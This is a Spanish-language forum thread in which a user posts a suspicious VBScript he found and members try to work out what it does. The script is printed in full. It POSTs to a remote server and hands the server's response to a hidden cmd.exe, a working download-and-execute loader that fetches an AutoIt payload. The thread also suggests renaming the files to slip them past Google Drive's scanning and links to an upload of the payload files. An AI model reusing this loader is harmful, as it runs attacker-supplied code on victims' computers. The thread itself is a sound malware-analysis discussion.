Virus en vbs

Iniciado por xDark_R, 9 Febrero 2020, 23:29 PM

0 Miembros y 1 Visitante están viendo este tema.

xDark_R

Descargando unas cositas me he encontrado con un vbs bastante interesante y me gustaria saber que hace, se que transfiere un script al disco duro con extension .au3 pero no he podido abrirlo para ver que hace, alguna idea?

Este es el script

dim Winhttps
Set Winhttps = CreateObject("Winhttp.WinhttpRequest.5.1")
gkpaeb1 = "http://82.111.231.133.static.cdnserver.in/"
Winhttps.Open "POST", gkpaeb1, False
Winhttps.Send
dim Application
Application =  Wscript.ScriptName

CreateObject("Shell.Application").Application.ShellExecute "c:\windows\system32\cmd",Winhttps.responseText & Application,gkpaeb,"",0










Alvarito050506

#1
Hola xDark_R,

Actualmente la página http://82.111.231.133.static.cdnserver.in está caída, por lo que es imposible saber con exactitud qué es lo que hace este supuesto virus. El resultado del escaneo de VirusTotal no es demasiado "revelador", puedes echarle un vistazo aquí.

Tal vez, si subieras el archivo .au3 que mencionaste, podríamos ayudarte mejor.

¡Saludos!

Edito: Busca literalmente "cdnserver.in" (con las comillas y todo) en Google, parece haber algo de información por ahí. Seguiré investigando.

xDark_R

No se como subirlo, tambien he visto que esta caida pero lo he ejecutado en una maquina virtual y si que funciona.

Alvarito050506

Por lo de cómo subirlo, cámbiale la extensión a una conocida y súbelo a algún servicio del estilo MEGA que no examine los archivos (maldito Google Drive). Creo que MEGA incluso te deja subir archivos con la extensión que quieras.

Otra cosa que podés hacer antes que nada es abrir el archivo con el Notepad++ o un editor hexadecimal (Bless, hexdump) y fijarte cuales son los primeros seis caracteres, con eso podés saber qué tipo de archivo es en realidad (saber su MIME Type).

Con respecto a lo de la máquina virtual,  :o, es algún tipo de protección que ofrece Cloudflare, pero no sé más qué decir.

xDark_R

He subido todo lo que he conseguido, en la foto esta el código que se ejecuta en la consola de windows y en la carpeta están los archivos que descarga el script

https://mega.nz/#F!5sJg3IhR!klSoZowEAxN7CQVsg8KxZQ

Alvarito050506

Bueno, el código de la imagen es simplemente una manera "elegante" de descargar los archivos y ejecutar el script de AutoIt base.au3. Buscaré una forma de descompilarlo (las hay miles) pero, mientras tanto, ¿podrías subir el contenido del archivo %temp%\test.txt?

xDark_R

No se crea ese archivo lo he ejecutado varias veces y nada, puede que lo borre después con el otro script (el .au3).

Alvarito050506

Hmmm... Interesante. Mañana continuaré con la "investigación:rolleyes:.